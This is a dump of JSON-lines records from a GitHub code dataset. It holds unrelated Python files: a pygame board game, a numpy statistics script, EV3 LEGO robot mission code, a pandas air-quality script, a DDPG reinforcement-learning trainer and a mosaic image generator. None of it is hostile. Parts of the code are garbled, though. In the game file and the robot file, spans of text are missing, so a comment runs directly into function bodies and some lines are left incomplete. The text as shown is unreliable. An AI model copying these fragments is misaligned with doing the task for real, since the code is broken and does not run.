img\r\n\r\ngame_board=image_loader('assets/brd2.png',WIDTH,HEIGHT)\r\neraser=image_loader('assets/eraser.png',90,90)\r\neraser_selected=image_loader('assets/eraser_selected.png',90,90)\r\nsharpner=image_loader('assets/sharpner.png',90,90)\r\nsharpner_selected=image_loader('assets/sharpner_selected.png',90,90)\r\ntitle=image_loader('assets/title.png',90,90)\r\ntutorial=image_loader('assets/tutorial.png',90,90)\r\nabout=image_loader('assets/about.png',90,90)\r\n\r\nfont1 =pygame.font.Font('freesansbold.ttf',20)\r\nfont2=pygame.font.Font('freesansbold.ttf',42)\r\ngui_font = pygame.font.Font(None, 30)\r\n\r\n# ------\r\n# SCREEN\r\n# ------\r\nscreen = pygame.display.set_mode( (WIDTH, HEIGHT) )\r\npygame.display.set_caption( '3 Men Morris' )\r\n\r\n# -------------\r\n# CONSOLE BOARD\r\n# -------------\r\nboard = [[ 0 , 0 , 0 ],\r\n [ 0 , 0 , 0 ],\r\n [ 0 , 0 , 0 ]]\r\n\r\n# ---------\r\n# FUNCTIONS\r\n# ---------\r\ndef click_valid(x,y):\r\n row,col=None,None\r\n for row in range(3):\r\n for col in range(3):\r\n if x_centres[col]-radiussharpner_won_times else 'Sharpner' } is the ultimate winner!\"\r\n msg2=f\"{'Eraser' if eraser_won_times 0, 'no valid data found in files matching mask list'\n\n xi = [npz['xi'] for npz in npzs]\n fractions = [npz['frac'] for npz in npzs]\n\n if len(npzs) == 1:\n xi = xi[0]\n fractions = fractions[0]\n else:\n xi = np.hstack(xi)\n fractions = np.hstack(fractions)\n #idx = np.argsort(fractions)\n #return fractions[idx], xi[idx]\n return fractions, xi\n\n\niso_fractions, iso_xi = load_data(args.iso)\nassert np.max(iso_fractions) == 0.\nfractions, xi = load_data(args.mixed)\n\n\nif np.mean(iso_xi) > np.mean(xi): # below we assume <= \n xi *= -1.\n iso_xi *= -1.\n\nalpha_thr = np.quantile(iso_xi, 1.-args.alpha)\n\n# sort by xi\nidx = np.argsort(xi)\nfractions = fractions[idx]\nxi = xi[idx]\n\n\nthr_idx = np.where(xi >= alpha_thr)[0][0]\n\nfracs = np.array(sorted(list(set(fractions))))\n\nbeta = np.zeros_like(fracs)\n\nfor i_f, f in enumerate(fracs):\n idx = np.where(fractions == fracs[i_f])[0]\n idx_left = np.where(idx < thr_idx)[0]\n beta[i_f] = len(idx_left)/len(idx)\n\nth_eta = 1.\n\ni = np.where(beta < args.beta)[0]\nif len(i) > 0:\n th_eta = fracs[i[0]]\n\ntable = np.hstack((fracs.reshape((-1, 1)), beta.reshape((-1, 1))))\noutput_file_name = args.mixed[0].replace('.npz','').replace('*','XXX') + '.beta'\nnp.savetxt(output_file_name, table, fmt='%g', header='#frac\\tbeta')\n\nprint(th_eta)\n\nexit(0)\n","repo_name":"okolo/ml_cr_aniso","sub_path":"src/calc_min_fractions_ps.py","file_name":"calc_min_fractions_ps.py","file_ext":"py","file_size_in_byte":2401,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"31"} +{"seq_id":"8750334040","text":"#!/usr/bin/env micropython\n# #/usr/bin/env python3\nfrom ev3dev2.motor import LargeMotor, OUTPUT_A, OUTPUT_B, OUTPUT_D, SpeedPercent, MoveTank\nfrom ev3dev2.sensor import INPUT_1, INPUT_2, INPUT_3, INPUT_4\nfrom ev3dev2.sensor.lego import TouchSensor\nfrom ev3dev2.led import Leds\nfrom ev3dev2.motor import *\nfrom ev3dev2.wheel import *\nfrom ev3dev2.sensor.lego import *\nfrom ev3dev2.sensor import *\nfrom ev3dev2.button import *\n# from ev3dev2.display import Display\nfrom ev3dev2.console import Console\nfrom ev3dev2.sound import Sound\n# import ev3dev2.fonts as fonts\nimport logging\nimport time\n\nlogging.basicConfig(level=logging.DEBUG)\n\n# Use the gyro for turns\nTURN_WITH_GYRO = True\n\nGYRO_RESET_WAIT = 4\n\nWHEEL_DIAMATER = 6.88\nM_MOTOR = OUTPUT_B\nS_MOTOR = OUTPUT_C\n\ngyro = GyroSensor(INPUT_4)\ndisp = Console()\nb = Button()\ns = Sound()\n\ncolor_left = ColorSensor(INPUT_2)\ncolor_right = ColorSensor(INPUT_3)\n# 14, 18, ...\n# See all: https://python-ev3dev.readthedocs.io/en/latest/display.html\n# f = fonts.load('luBS18')\n\n\"\"\"\nPlease depending on the robot change the number below: <<< IMPORTANT!!!! HEY!!!!\nWHICH_ROBOT = 0 is if the robot has one color sensor <<<<< 0:\n lspeed = speed\n else:\n lspeed = -speed\n turn_about_center = True\n if turn_about_center:\n rspeed = -lspeed\n else:\n rspeed = 0\n time.sleep(0.5)\n gyro.reset()\n\n start = gyro.value()\n log.info(\"gyro inital value: {}\".format(start))\n log.info(\"gyro in mode: {}\".format(gyro.mode))\n # log.info(\"gyro inital value after mode set: {}\".format(gyro.value))\n\n tank_drive.on(lspeed, rspeed)\n log.info(\"turning {}: {} {}\".format(deg, lspeed, rspeed))\n\n if do_correction:\n turn_guess = abs(deg)\n else:\n turn_guess = abs(deg) - 9\n gyro.wait_until_angle_changed_by(abs(turn_guess))\n tank_drive.off()\n time.sleep(0.5)\n\n final = gyro.value()\n\n log.info(\"gyro final value: {}\".format(final))\n log.info(\"angle: {} actual: {}\".format(deg, final - start))\n log.info(\"stopping\")\n\n if do_correction:\n # Go back the amount we missed or went over.\n correction = final - deg\n log.info(\"correction: {}\".format(correction))\n\n if abs(correction) <= 1:\n pass\n else:\n if deg > 0:\n lspeed = 5\n else:\n lspeed = -5\n turn_about_center = True\n if turn_about_center:\n rspeed = -lspeed\n else:\n rspeed = 0\n\n tank_drive.on(rspeed, lspeed)\n log.info(\"C: turning {}: {} {}\".format(deg, lspeed, rspeed))\n log.info(\"C: gyro in mode: {}\".format(gyro.mode))\n log.info(\"C: gyro inital value: {}\".format(gyro.value()))\n gyro.mode = GyroSensor.MODE_GYRO_ANG\n log.info(\"C: gyro inital value after mode set: {}\".format(gyro.value()))\n\n gyro.wait_until_angle_changed_by(abs(correction)-1)\n tank_drive.off()\n time.sleep(0.5)\n log.info(\"C: gyro final value: {}\".format(gyro.value()))\n\n# do_correction is ignored\ndef turn_degrees_gyro(gyro, deg, speed=20, do_correction=True):\n #gyro.mode = GyroSensor.MODE_GYRO_ANG\n\n if deg > 0:\n lspeed = speed\n else:\n lspeed = -speed\n turn_about_center = True\n if turn_about_center:\n rspeed = -lspeed\n else:\n rspeed = 0\n #time.sleep(0.5)\n #gyro.reset()\n\n start = gyro.value()\n log.info(\"wheel speed: {} {}\".format(lspeed, rspeed))\n log.info(\"gyro inital value: {}\".format(start))\n log.info(\"gyro in mode: {}\".format(gyro.mode))\n # log.info(\"gyro inital value after mode set: {}\".format(gyro.value))\n\n tank_drive.on(lspeed, rspeed)\n log.info(\"turning {}: {} {}\".format(deg, lspeed, rspeed))\n\n # last part turn slow\n slow_degrees = 10\n turn_guess = abs(deg) - slow_degrees\n\n if turn_guess > 0:\n gyro.wait_until_angle_changed_by(turn_guess)\n\n # finish slow\n slow_speed = 5\n if lspeed > 0:\n lspeed = slow_speed\n rspeed = -slow_speed\n else:\n lspeed = -slow_speed\n rspeed = slow_speed\n log.info(\"wheel speed: {} {}\".format(lspeed, rspeed))\n tank_drive.on(lspeed, rspeed)\n #log.info(\"gyro intermediate value: {}\".format(gyro.value()))\n\n # code from gyro.wait_until_angle_changed_by\n delta = deg\n if delta > 0:\n while (gyro.value() - start) < delta:\n time.sleep(0.01)\n else:\n delta *= -1\n while (start - gyro.value()) < delta:\n time.sleep(0.01)\n\n tank_drive.off()\n time.sleep(0.5)\n\n final = gyro.value()\n\n log.info(\"gyro final value: {}\".format(final))\n log.info(\"angle: {} actual: {}\".format(deg, final - start))\n log.info(\"stopping\")\n\n\ndef my_turn_left(speed=20, angle=90):\n if TURN_WITH_GYRO:\n turn_degrees_gyro(gyro, -angle, speed, do_correction=False)\n else:\n tank_diff.turn_left(speed, angle)\n\n\ndef my_turn_right(speed=20, angle=90):\n if TURN_WITH_GYRO:\n turn_degrees_gyro(gyro, angle, speed, do_correction=False)\n else:\n tank_diff.turn_right(speed, angle)\n\n\ndef turn_degrees(gyro, deg, speed=15):\n if deg > 0:\n my_turn_right(speed, deg)\n else:\n my_turn_left(speed, -deg)\n\n\ndef inches_to_mill(inches):\n return 25.4 * inches\n\n\ndef move_turn():\n tank_drive.on_for_seconds(SpeedPercent(-50), SpeedPercent(-50), 1)\n tank_drive.on_for_seconds(SpeedPercent(-50), SpeedPercent(50), 0.65)\n\n\ndef inches_to_rotations_old(distance):\n # wheel diameter is 43.2mm (?)\n circum_inches = 4.32 * 3.14 / 2.54\n rotations = distance / circum_inches\n\n return rotations\n\n\ndef inches_to_rotations(distance):\n # wheel diameter is 43.2mm (?), 68.8 for larger\n circum_inches = WHEEL_DIAMETER * 3.14 / 2.54\n rotations = distance / circum_inches\n\n return rotations\n\n\ndef drive_inches(distance, speed=20):\n rotations = inches_to_rotations(distance)\n speed = -speed if IS_INVERTED else speed\n # tank_drive.on_for_rotations(SpeedPercent(speed), SpeedPercent(speed), rotations)\n tank_diff.on_for_distance(SpeedPercent(\n speed), inches_to_mill(distance))\n\n\ndef drive_inches_L_N_K_(distance, speed=30):\n speed = -speed if IS_INVERTED else speed\n target = gyro.angle\n\n\ndef mission_2_crane(gyro):\n drive_inches(12)\n # 6 inches out 6 inches over\n turn_degrees(gyro, 45)\n drive_inches(7*1.414)\n turn_degrees(gyro, -45)\n drive_inches(9)\n drive_inches(6, -20)\n turn_degrees(gyro, -45)\n drive_inches(3*1.414)\n turn_degrees(gyro, 45)\n drive_inches(4)\n\n\ndef mission_white_blocks(gyro):\n\n drive_inches(.85, speed=12)\n # turn_degrees(gyro, -72, 15)\n my_turn_right(15, 69.25)\n drive_inches(61, 30)\n # LIFTER.on_for_rotations(10, 1)\n drive_inches(-4, 30)\n # LIFTER.on_for_rotations(10, -1, False)\n\n # turn_degrees(gyro, 180, 7)\n\n # turn_degrees(gyro, -85, 35)\n\n # turn_degrees(gyro, -85, 35)\n\n # drive_inches(26)\n\n\ndef down(gyro):\n lifter.on_for_degrees(-50, 15, brake=False)\n\n\ndef big_O_by_crane(gyro):\n\n # This is driving to the crane and doing two missions: M02 and M12.\n\n # Drives out quickly and then slower for more accuracy.\n drive_inches_gyro(dist=25, speed=20, factor=1)\n drive_inches_gyro(1.5, 10)\n time.sleep(1.0)\n drive_inches(-2, 20)\n\n # Raises side holder, or medium motor.\n side_motor.on_for_degrees(speed=20, degrees=109)\n\n # Attempts to not crash into the load.\n my_turn_left(20, 10)\n drive_inches(-2, 20)\n my_turn_right(20, 10)\n\n # Returns to the home base.\n drive_inches(-12.5, 40)\n my_turn_right(20, 90)\n drive_inches(-20, 40)\n drive_inches(2, 40)\n my_turn_left(40, 80)\n\n\n\n\ndef circle_straight(gyro):\n drive_inches(16, 30)\n lifter.on_for_rotations(50, 1)\n drive_inches(-8, 30)\n my_turn_right(15, 45)\n drive_inches(-19, 30)\n drive_inches(1, 30)\n my_turn_left(15, 90)\n s.beep()\n s.beep()\n s.beep()\n s.beep()\n\n\ndef drive_out_black_line_with_cs(raise_side=True):\n # extend lowwer bar two studs and add lift after placement of tan blocks, lower it again and lift after earthquake\n #drive_inches(5, 15)\n # Use gyro\n gyro_zero = gyro.value()\n drive_inches_gyro(5, 15)\n # lots of weight on left so read how much turned\n # starting at 0\n time.sleep(0.01)\n gyro_start = gyro.value()\n log.info(\"Initial gyro angle: {}\".format(gyro_start))\n #extra_turn = -gyro_start + 1\n extra_turn = -(gyro_start - gyro_zero) + 1\n my_turn_right(15, 90 + extra_turn)\n\n # first get to line to follow\n edge = \"right\"\n drive_inches_gyro(11.7, 30)\n\n # 20.5 along line\n # do we lift side pusher on way out?\n if raise_side:\n # drive a little lift then drive the rest\n follow_line_inches(dist=18, speed=30, edge=edge, want_rli=32)\n # lift\n side_motor.on_for_degrees(speed=20, degrees=109)\n follow_line_inches(dist=2.5, speed=30, edge=edge, want_rli=32)\n else:\n follow_line_inches(dist=20.5, speed=30, edge=edge, want_rli=32)\n #drive_inches(5, 30)\n drive_inches(3, 20)\n\n\ndef mission_tan_blocks_plus(gyro):\n\n # This mission does these seven missions: M01, M07, M08, M09, M11, M12 and M13.\n\n # Drives out for a good start, then folows the black line to the red circle.\n # Leaves red blocks and train(M11) in circle.\n drive_out_black_line_with_cs(raise_side=True)\n\n # Get pointed toward the black line\n # Back hits ramp if turn all at once\n my_turn_left(speed=15, angle=20)\n drive_inches(3, 20)\n my_turn_left(speed=15, angle=10)\n align_accurate(10, num_passes=3)\n\n # how far tan circle is from black line\n tan_dist = 10\n drive_inches(tan_dist, 30)\n my_turn_left(20, 90)\n # get closer to black line\n drive_inches(2, 20)\n # align will watch for one sensor to see white on way\n #align_color(\"White\")\n # Stop at the line and goes a little bit further.\n align_accurate(10, num_passes=3)\n # push to tan circle and come back a little less for elevator\n tan_push = 5.35\n drive_inches(tan_push, 20)\n drive_inches(-tan_push + 0.5, 20)\n\n # M08_Elevator\n my_turn_right(20, 90)\n # flip the elevator\n # already came tan_dist from the black line\n drive_inches(19 - tan_dist, 40)\n # lift bar over elevator and back up\n lifter.on_for_rotations(50, 1, brake=False)\n drive_inches(-10, speed=20)\n lifter.on_for_rotations(-50, 1, brake=False)\n\n # M09_safety factor\n turn_extra = 12\n my_turn_right(15, 30 + turn_extra)\n lifter.on_for_degrees(50, 120, brake=False)\n drive_inches(6, 20)\n # swing front pointer 20 left, (20 right to straighten then) 20 right\n swing_turn = 20\n swing_first = 5\n my_turn_left(15, turn_extra + swing_first)\n # push building support down\n lifter.on_for_degrees(-50, 90, brake=False)\n building_drive_more = 0.25\n drive_inches(building_drive_more, 10)\n my_turn_left(15, swing_turn - swing_first)\n drive_inches(-1 - building_drive_more, 20)\n\n # M07 Swing\n # point towards the swing\n my_turn_right(20, swing_turn + 90 - 2)\n # lift arm to push swing\n lifter.on_for_degrees(50, 90, brake=False)\n # drive to swing\n drive_inches(4, 30)\n # push swing by turning a little\n my_turn_left(20, 30)\n my_turn_right(20, 15)\n\n # backup 6 inches for safe turn\n drive_inches(-6, 30)\n lifter.on_for_degrees(50, 600, brake=False)\n\n # M01 Elevated Places\n # align on line perp to ramp line\n # watch out for the lettering over white\n my_turn_left(speed=20, angle=185)\n align_accurate(10, num_passes=3, white_first=False)\n # get color sensors away from black line\n drive_inches(1.5, 20)\n # get to ramp line\n my_turn_left(10, 90)\n drive_inches(4, 20)\n align_accurate(10, num_passes=2)\n drive_inches(1.75, 15)\n my_turn_right(10, 90)\n drive_inches(10, 15)\n\n # Lower lift for less tippyness.\n lifter.on_for_degrees(50, -300, brake=False)\n # go up ramp\n\n # The Big Ending\n align_accurate(10, num_passes=2)\n drive_inches(-2, 20)\n # drive with gyro cause slides on ramp\n drive_inches_gyro(46, 40)\n s.set_volume(100)\n play_sound = 0\n while play_sound < 3:\n s.play_file('sound/crazy-mono.wav')\n play_sound = play_sound + 1\n\n # TODO Lock The Motors\n\n\ndef mission_red_blocks(gyro):\n \"\"\"\n Setup:\n Line up robot from wall to the 5th from the right hashmark.\n Line up blocks so it looks like a rectangle.\n Two pieces of LEGO block will be sticking up on oppisite ends.\n Place an upgrade on the furthest LEGO block sticking up.\n Make sure that the blocks are lined up on the left side of the attachment.\n Your good to go!\n \"\"\"\n\n drive_inches(9, 20)\n my_turn_right(15, 85)\n drive_inches(22.5, 30)\n drive_inches(-37, 80)\n my_turn_left(80, 80)\n\n\ndef motor_test(gyro):\n lifter.on_for_rotations(50, 1)\n lifter.on_for_rotations(50, -1)\n\n\ndone = False\nwait_for = None\nchoice = 0\nchoice_incr = 1\nturn_ang = 180\n\n\ndef turn_test(gyro):\n my_turn_right(15, turn_ang)\n time.sleep(5)\n my_turn_left(15, turn_ang)\n\ndef gyro_reset(gyro):\n gyro.mode = GyroSensor.MODE_GYRO_ANG\n gyro.reset()\n time.sleep(GYRO_RESET_WAIT)\n\ndef drop_frame(gyro):\n \"\"\"\n Lowers side motor in between missions\n \"\"\"\n\n side_motor.on_for_degrees(speed=20, degrees=-109)\n\ndef test_drive_straigh_gyro(gyro):\n drive_inches_gyro(12, 20)\n\nprogs = [\n\n #(\"m: line\", follow_line_left_wrap),\n (\"m: Big O Crane\", big_O_by_crane),\n (\"m: drop frame\", drop_frame),\n (\"m: tan blocks\", mission_tan_blocks_plus),\n (\"m: circle_straight\", circle_straight),\n # (\"m: ReD EnDiNg\", red_ending),\n (\"gyro_reset\", gyro_reset),\n #(\"test_sgyro\", test_drive_straigh_gyro),\n # (\"m: align\", align_once),\n # (\"m: test\", motor_test),\n # (\"m: turn_test\", turn_test),\n # (\"m: white blocks\", mission_white_blocks),\n # (\"m: red blocks\", mission_red_blocks),\n # (\"m: 2 crane\", mission_2_crane),\n]\n\n\ndef change(changed_buttons):\n global done\n global choice\n global turn_ang\n # changed_buttons is a list of\n # tuples of changed button names and their states.\n if len(changed_buttons) == 0:\n return False\n logging.info('These buttons changed state: ' + str(changed_buttons))\n if wait_for is not None and wait_for in changed_buttons:\n logging.info('You pressed the done button')\n done = True\n else:\n done = False\n if \"up\" in changed_buttons:\n choice -= 1\n if choice < 0:\n choice = len(progs) - 1\n s.beep()\n elif \"down\" in changed_buttons:\n choice += 1\n if choice >= len(progs):\n choice = 0\n s.beep()\n elif \"left\" in changed_buttons:\n lifter.on_for_degrees(-100, 15, brake=True)\n elif \"right\" in changed_buttons:\n lifter.on_for_degrees(100, 15, brake=True)\n logging.info('Done is: ' + str(done))\n return done\n\n# Set callback from b.process()\n\n\ndef run_program(gyro):\n # This loop checks button states\n # continuously and calls appropriate event handlers\n global done\n global wait_for\n global choice\n done = False\n wait_for = \"enter\"\n logging.info(\"Waiting for enter button.\")\n logging.info(sys.implementation.name == \"micropython\")\n ang = 0\n count = 0\n while not done:\n if count % 20 == 0:\n ang = gyro.angle\n #ang = gyro.value()\n #ang = 0\n count = 0\n if True:\n rli_left = color_left.reflected_light_intensity\n rli_right = color_right.reflected_light_intensity\n # t = \"rli: {} {}\".format(rli_left, rli_right)\n t = \"rli: {} {}\\nP: {}\\nA: {}\\nWaiting for l button\".format(\n rli_left, rli_right, progs[choice][0], ang)\n show(t)\n done = change(b.buttons_pressed)\n time.sleep(0.05)\n count += 1\n\n logging.info(\"And done.\")\n logging.info(\"Running {}\".format(progs[choice][0]))\n\n # added 1/9/2020\n #gyro.reset()\n #time.sleep(1)\n\n progs[choice][1](gyro)\n s.beep()\n\n choice = choice + choice_incr\n\n\nif __name__ == \"__main__\":\n # Resets to 0, does not fix drift\n time.sleep(1)\n gyro.mode = GyroSensor.MODE_GYRO_ANG\n gyro.reset()\n time.sleep(GYRO_RESET_WAIT)\n logging.info(\"Starting angle: {}\".format(gyro.angle))\n b.on_change = change\n s.beep()\n s.beep()\n s.beep()\n while True:\n run_program(gyro)\n","repo_name":"toddbyrne/fll","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":26777,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"41720539622","text":"import numpy as np\nimport pandas as pd\n\n\n# 데이터 불러오기\n\nraw_data = pd.read_csv('Data/Daejeon.csv',\n encoding = 'euc-kr')\ndata = raw_data.copy()\ndata.head()\n\ndata['location'] = data['location'].map({'UND' : 0,\n 'DSD' : 1,\n 'GSD' : 2,\n 'JLD' : 3,\n 'MCD' : 4,\n 'MPD' : 5,\n 'NED' : 6,\n 'SND' : 7,\n 'UND' : 8,\n 'WPD' : 9})\n\ndata['SO2'] = data['SO2'].fillna(data['SO2'].mean())\ndata['SO2'] = data['SO2'].fillna(0)\ndata['PM10'] = data['PM10'].fillna(0)\ndata['O3'] = data['O3'].fillna(0)\ndata['NO2'] = data['NO2'].fillna(0)\ndata['CO'] = data['CO'].fillna(0)\ndata['PM25'] = data['PM25'].fillna(0)\n\ndata\n\ndef MinMaxScaler(data1):\n numerator = data1 - np.min(data1, 0)\n denominator = np.max(data1, 0) - np.min(data1, 0)\n return numerator / (denominator + 1e-7), np.min(data1, 0), np.max(data1, 0)\n\ndata1 = np.reshape(data[:, 2:], [-1, 25, 6, 1])","repo_name":"heechul90/project-python-2","sub_path":"Daejeon.py","file_name":"Daejeon.py","file_ext":"py","file_size_in_byte":1246,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"40383141558","text":"from torch_rl.training.core import *\nfrom torch.optim import Adam\nfrom torch_rl.utils import *\n\nfrom torch_rl.core import ActorCriticAgent\nfrom torch_rl.memory import SequentialMemory\nimport copy\nfrom torch_rl.utils import logger\n\n\"\"\"\n Implementation of deep deterministic policy gradients with soft updates.\n\n\"\"\"\n\nclass DDPGTrainer(Trainer):\n\n critic_criterion = mse_loss\n\n def __init__(self, env, actor, critic, num_episodes=2000, max_episode_len=500, batch_size=32, gamma=.99,\n replay_memory=SequentialMemory(1000000, window_length=1), tau=1e-3, lr_critic=1e-3, lr_actor=1e-4, warmup=2000, depsilon=1./5000,\n epsilon=1., exploration_process=None,\n optimizer_critic=None, optimizer_actor=None):\n super(DDPGTrainer, self).__init__(env)\n if exploration_process is None:\n self.random_process = OrnsteinUhlenbeckActionNoise(self.env.action_space.shape[0])\n else:\n self.random_process = exploration_process\n self.action_choice_function = random_process_action_choice(self.random_process)\n self.tau = tau\n self.lr_critic = lr_critic\n self.num_episodes = num_episodes\n self.batch_size = batch_size\n self.replay_memory = replay_memory\n self.max_episode_len = max_episode_len\n self.epsilon = epsilon\n self.depsilon = depsilon\n self.warmup = warmup\n self.gamma = gamma\n self.target_critic = copy.deepcopy(critic)\n self.target_actor = copy.deepcopy(actor)\n self.optimizer_actor = Adam(actor.parameters(), lr=lr_actor) if optimizer_actor is None else optimizer_actor\n self.optimizer_critic = Adam(critic.parameters(), lr=lr_critic) if optimizer_critic is None else optimizer_critic\n\n self.goal_based = hasattr(env, \"goal\")\n\n self.target_agent = ActorCriticAgent(self.target_actor,self.target_critic)\n self.agent = ActorCriticAgent(actor, critic)\n\n def add_to_replay_memory(self,s,a,r,d):\n if self.goal_based:\n self.replay_memory.append(self.state, self.env.goal, a, r, d, training=True)\n else:\n self.replay_memory.append(self.state, a, r, d, training=True)\n\n def _warmup(self):\n\n for i in range(self.warmup):\n a = self.env.action_space.sample()\n s, r, d, _ = self.env.step(a)\n self.add_to_replay_memory(self.state, a, r, d)\n self.state = s\n\n def _episode_start(self):\n\n self.random_process.reset()\n\n def _episode_step(self, episode):\n if self.goal_based:\n action = self.agent.action(np.hstack((self.state, self.env.goal))).cpu().data.numpy()\n else:\n action = self.agent.action(self.state).cpu().data.numpy()\n\n # Choose action with exploration\n action = self.action_choice_function(action, self.epsilon)\n if self.epsilon > 0:\n self.epsilon -= self.depsilon\n\n state, reward, done, info = self.env.step(action)\n\n self.add_to_replay_memory(self.state, action, reward, done)\n self.state = state\n\n # Optimize over batch\n if self.goal_based:\n s1, g, a1, r, s2, terminal = self.replay_memory.sample_and_split(self.batch_size)\n s1 = np.hstack((s1,g))\n s2 = np.hstack((s2,g))\n else:\n s1, a1, r, s2, terminal = self.replay_memory.sample_and_split(self.batch_size)\n\n\n a2 = self.target_agent.actions(s2, volatile=True)\n\n q2 = self.target_agent.values(to_tensor(s2, volatile=True), a2, volatile=False)\n q2.volatile = False\n\n q_expected = to_tensor(np.asarray(r), volatile=False) + self.gamma * q2\n q_predicted = self.agent.values(to_tensor(s1), to_tensor(a1), requires_grad=True)\n\n self.optimizer_critic.zero_grad()\n loss_critic = DDPGTrainer.critic_criterion(q_expected, q_predicted)\n loss_critic.backward()\n self.optimizer_critic.step()\n # Actor optimization\n\n a1 = self.agent.actions(s1, requires_grad=True)\n q_input = tor.cat([to_tensor(s1), a1], 1)\n q = self.agent.values(q_input, requires_grad=True)\n loss_actor = -q.mean()\n\n self.optimizer_actor.zero_grad()\n loss_actor.backward()\n self.optimizer_actor.step()\n\n logger.logkv('loss_actor', loss_actor.cpu().data.numpy())\n logger.logkv('loss_critic', loss_critic.cpu().data.numpy())\n logger.logkv('epsilon', self.epsilon)\n\n soft_update(self.target_agent.policy_network, self.agent.policy_network, self.tau)\n soft_update(self.target_agent.critic_network, self.agent.critic_network, self.tau)\n\n return state, reward, done, {}\n\n def _episode_end(self, episode):\n pass\n\n","repo_name":"jimimvp/torch_rl","sub_path":"torch_rl/training/ddpg.py","file_name":"ddpg.py","file_ext":"py","file_size_in_byte":4751,"program_lang":"python","lang":"en","doc_type":"code","stars":11,"dataset":"github-code","pt":"31"} +{"seq_id":"16891484364","text":"import os\r\nfrom os import path\r\nimport numpy as np\r\nfrom math import ceil\r\nimport cv2\r\n\r\nfrom images import TemplateImage, ElementImage\r\n\r\nclass MosaicGenerator():\r\n\t\"\"\"This class contains all of the properties and functions for\r\n\tgenerating a mosaic image.\"\"\"\r\n\r\n\tdef __init__(self, template_path, resolution, element_path, element_size,\r\n\t\tmosaic_path):\r\n\t\t\"\"\"\r\n\t\tInitialize an instance of the MosaicGenerator class.\r\n\r\n\t\t-Parameters-\r\n\r\n\t\ttemplate_path:\t\tpath of the template image to be used for generating\r\n\t\t\t\t\t\t\tthe mosaic\r\n\r\n\t\tresolution:\t\t\tthe number of pixels in the template image to be\r\n\t\t\t\t\t\t\trepresented by an element image of the mosaic.\r\n\t\t\t\t\t\t\tPixel count represents pixels on one side of a square\r\n\r\n\t\telement_path:\t\tthe folder path for all of the element images to be\r\n\t\t\t\t\t\t\tused in the mosaic\r\n\r\n\t\telement_size:\t\tthe side length of an element image to be used in\r\n\t\t\t\t\t\t\tgenerating the mosaic\r\n\r\n\t\tmosaic_path:\t\tthe path to save the mosaic image file.\r\n\t\t\"\"\"\r\n\r\n\t\tself.template_path = template_path\r\n\t\tself.resolution = resolution\r\n\t\tself.element_path = element_path\r\n\t\tself.element_size = element_size\r\n\t\tself.mosaic_path = mosaic_path\r\n\t\tself.ti = TemplateImage(template_path, resolution)\r\n\t\tself.ei = self._get_element_images()\r\n\r\n\t\t# TEST\r\n\t\t#for element in self.ei:\r\n\t\t\t#print(self._compare_rgb_values((255, 125, 0), element.rgb))\r\n\r\n\t\tself.mosaic = self._build_mosaic()\r\n\r\n\t\t# TEST\r\n\t\t#print(self._get_matching_element(self.ei[6].rgb))\r\n\r\n\t\tcv2.imwrite(mosaic_path, self.mosaic)\r\n\r\n\tdef _get_element_images(self):\r\n\t\t\"\"\"\r\n\t\tReturns a list of ElementImage objects to be used in generating the\r\n\t\tmosaic.\r\n\r\n\t\telement_path:\tfolder path contianing the element images\r\n\r\n\t\telement_size:\tthe side length of the images for scaling and cropping\r\n\t\t\"\"\"\r\n\r\n\t\telement_images = []\r\n\t\timage_files = os.listdir(self.element_path)\r\n\r\n\t\tfor file_name in image_files:\r\n\t\t\tfile_path = self.element_path + '/' + file_name\r\n\t\t\telement_images.append(ElementImage(file_path, self.element_size))\r\n\r\n\t\treturn element_images\r\n\r\n\r\n\tdef _build_mosaic(self):\r\n\t\t\"\"\"\r\n\t\tThe main function for building the mosaic.\r\n\t\t\"\"\"\r\n\r\n\t\t# Get template image and dimensions\r\n\t\ttemp = self.ti.template\r\n\t\ttemp_x = self.ti.template_width\r\n\t\ttemp_y = self.ti.template_height\r\n\r\n\t\t# Get mosaic dimensions and declare empty array for RGB values\r\n\t\tmos_x = ceil(self.ti.width / self.resolution) * self.element_size\r\n\t\tmos_y = ceil(self.ti.height / self.resolution) * self.element_size\r\n\t\tmos = np.empty(shape=(mos_y, mos_x, 3), dtype='uint8')\r\n\r\n\t\t# Get elements and size of elements\r\n\t\tei = self.ei\r\n\t\telm_x = elm_y = self.element_size\r\n\r\n\t\ty = 0\r\n\t\twhile y < temp_y:\r\n\t\t\ty_start = elm_y * y\r\n\t\t\ty_end = elm_y * (y + 1)\r\n\t\t\tx = 0\r\n\t\t\twhile x < temp_x:\r\n\t\t\t\tx_start = elm_x * x\r\n\t\t\t\tx_end = elm_x * (x + 1)\r\n\t\t\t\telm_i = self._get_matching_element(temp[y,x])\r\n\t\t\t\telm = ei[elm_i].image\r\n\t\t\t\tmos[y_start : y_end, x_start : x_end] = elm\r\n\t\t\t\tx += 1\r\n\r\n\t\t\ty += 1\r\n\r\n\t\treturn mos\r\n\r\n\tdef _get_matching_element(self, rgb):\r\n\t\t\"\"\"\r\n\t\tReturns the index of an element image in self.ei that most closely\r\n\t\tmatches the rgb value provided.\r\n\r\n\t\trgb:\t\ta tuple of integers representing RGB values of a pixel.\r\n\t\t\"\"\"\r\n\r\n\t\t# Build a list that contains all of the 'distances' of the image RGB\r\n\t\t# values to the input RGB value.\r\n\t\tdistances = []\r\n\t\tfor image in self.ei:\r\n\t\t\tdistances.append(self._compare_rgb_values(rgb, image.rgb))\r\n\r\n\t\t# Return the index of the element image with the shortest distance\r\n\t\treturn distances.index(min(distances))\r\n\r\n\r\n\tdef _compare_rgb_values(self, rgb_1, rgb_2):\r\n\t\t\"\"\"\r\n\t\tUses linear algebra to check the 'closeness' of one set of RGB values\r\n\t\tto another. Considers the RGB values as points in 3-space and returns \r\n\t\tthe magnitude of the vector between them as a float.\r\n\r\n\t\trgb_1, rgb_2: \ttuples containing integers for the RGB values\r\n\t\t\t\t\t\tex. (R, G, B) = (156, 136, 125)\r\n\t\t\"\"\"\r\n\r\n\t\t# Get 'distances' between red, green, and blue values of each set\r\n\t\tdiff_r = rgb_1[0] - rgb_2[0]\r\n\t\tdiff_g = rgb_1[1] - rgb_2[1]\r\n\t\tdiff_b = rgb_1[2] - rgb_2[2]\r\n\r\n\t\t# Use Pythagorean theorem to return the distance between rgb_1 and rgb_2\r\n\t\treturn (diff_r**2 + diff_g**2 + 